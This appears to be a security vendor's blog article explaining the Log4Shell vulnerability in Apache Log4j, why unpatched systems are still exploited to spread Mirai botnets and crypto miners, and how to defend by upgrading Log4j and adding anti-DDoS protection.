People sometimes compare cybersecurity to a game of whack a mole. Hackers discover new vulnerabilities to exploit, and developers scramble to knock them down, releasing patches to mitigate the emerging threat.
Unfortunately, it’s not that simple. Completely removing a vulnerability with a single update is challenging. First, you have to understand the full extent of the threat and deliver a comprehensive solution quickly. Next, you’ve got to get everyone to download and install the update.
Sometimes vulnerabilities are found in widely used software embedded deep in systems such that the organizations and people using it aren’t even aware they are at risk.
This is why the vulnerability in the Log4j software is still a problem. Although we have an update solving the problem, many organizations at risk are unaware their systems even use the Log4J software. The vulnerability is still regularly leveraged to deploy malware, including recruiting infected devices into DDoS botnets or planting crypto miners.
The continuing threat from vulnerabilities we know and have patches for, let alone those yet to be found, highlights the limitations of a whack a mole approach in cybersecurity. Instead, organizations need to get ahead of the issue. They need proactive protection plans that include advanced bot protection, web application firewalls, DDoS mitigation, and more.
What is Log4Shell?
Log4j is an open-source piece of software developed by the Apache Software Foundation. It records events (errors, routine system operations, etc.) to communicate diagnostic messages to system administrators and users. It essentially acts as a massive diary logging the activity for a given system or application.
An example of Log4J in operation is the “404 error message” when clicking on a bad link online. The web server for that domain informs you the webpage doesn’t exist, but it also logs the event using Log4j for the server’s system administrators to see.
Almost every piece of software out there will log information in some form for security, operational, or development reasons, and Log4j is a popular option. It is found across a vast number of software packages and online services from cloud services like iCloud and AWS, popular games such as Minecraft, and a broad range of software development and security tools.
In December 2021, a security researcher at Alibaba Cloud found a Remote Code Execution (RCE) vulnerability in Log4j. This vulnerability has become known as Log4Shell.
Log4Shell abuses a feature where users can specify custom code to format a log message. Unfortunately, this feature also allows third-party servers to submit code that can perform many different actions on a targeted computer. Left unfixed Log4Shell allows bad actors into a system to take control of it, steal sensitive information, and infect networks with malicious software. The exploit is also relatively simple to act on and doesn’t require high-level knowledge.
To carry out a cyberattack exploiting Log4Shell, hackers query services in order to trigger a log message. An example could be querying a web server to trigger a 404 error. However, the query also includes malicious code that Log4j mistakes for instructions.
From these instructions, cybercriminals can create a reverse shell and remotely control the target server or make it part of a botnet (multiple hijacked systems for coordinated attacks). Many hackers are currently abusing Log4Shell for:
- Ransomware attacks
- Mining cryptocurrency
- We’ve even seen government agencies targeted
Apache attempted to solve the problem by releasing an update, version 2.15.0. After identifying subsequent vulnerabilities, they released version 2.17.1, finally closing the loop on Log4Shell.
Log4Shell is an Enduring Threat
Reports suggest while there have been peaks and dips since Log4Shell’s discovery, the overall number of attacks remains relatively constant.
Remember we mentioned the challenge of getting everyone to update their software. Unfortunately, hackers still have a long list of potential targets running old Log4j versions to choose from: these include home users, service providers, software developers, and more.
While big companies like Amazon can mobilize en masse to patch their web services, many organizations are slower to react. Plus, it isn’t always immediately clear what exposure to Log4Shell organizations have. As a result, many may not even know they need to act.
Of the various malware payloads being delivered through Log4Shell, the most popular seems to be the Mirai botnet derivatives. Mirai malware targets publicly exposed devices such as network cameras and routers, making them part of a botnet.
These botnets can then be used for DDoS attacks against specific targets. The cybercriminals can then rent out their botnet for others to use or extort companies themselves by disrupting online services.
As large organizations become wise to the threat and update their Log4j use, the opportunity for lucrative ransomware attacks reduces. But there are many neglected systems users forget to update that are ideal targets for crypto mining and DDoS attacks.
Aside from Mirai, other malicious payloads in recent Log4Shell attacks include BillGates malware (DDoS), Kinsing (crypto miner), XMRig (crypto miner), and Muhstik (DDoS).
Protecting Against Log4Shell Botnets
The easiest way to protect against Log4Shell attacks is to keep all of your software up to date, ensuring they use Log4j version 2.17.1 or later.
Mirai botnets typically target devices that do not allow for updating individual packages and require you to check for firmware containing Log4j fixes that need applying.
There is also a range of solutions available to ensure you don’t become the target of a botnet full of Log4Shell recruits. These typically scan your system for unusual traffic, divert potential attacks, and filter out the real traffic from the bots just looking to bring down your service.
Stay informed and stay safe
Unfortunately, it seems Log4Shell attacks in some form are here to stay for now. But by staying informed, learning where Log4j fits into your software ecosystem, and looking into anti-DDoS solutions, you can keep your network safe from hackers and prevent your services from going down.